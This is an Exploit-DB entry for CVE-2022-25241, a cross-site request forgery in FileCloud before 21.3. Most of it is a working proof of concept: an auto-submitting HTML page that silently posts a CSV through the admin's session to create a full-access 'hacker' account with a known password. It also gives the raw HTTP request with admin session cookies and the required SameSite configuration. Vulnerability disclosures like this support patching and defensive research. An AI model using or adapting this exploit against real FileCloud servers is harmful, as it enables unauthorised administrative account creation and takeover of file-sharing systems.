FileCloud 21.2 - Cross-Site Request Forgery (CSRF)

EDB-ID:

50774




Platform:

PHP

Date:

2022-02-21


# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
# Date: 2022-02-20
# Exploit Author: Masashi Fujiwara
# Vendor Homepage: https://www.filecloud.com/
# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
# Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)
# Tested on:
#  OS: Ubuntu 18.04.6 LTS (Docker)
#  Apache: 2.4.52
#  FileCloud: 21.2.4.17315
# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)

# Conditions
1. Only vulnerable if cookies have samesite set to None (SameSite=None).
   echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
2. Use https as target url (When cookies set SameSite=None, also set Secure).

# PoC (HTML)
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">

<script>
function init(){
  myFormData = new FormData();
  let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});
  myFormData.append("uploadFormElement", fileContent, "user.csv");
  fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});
}
</script>
</head>
<body onload="init()">
CSRF PoC for CVE-2022-25241

Creat hacker user with Password1 via CSV file upload.
</body>
</html>



# HTTPS Request
POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
Host: 192.168.159.129:8443
Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
Content-Length: 365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Connection: close

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
Content-Type: application/vnd.ms-excel

UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--



# CSV file format
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES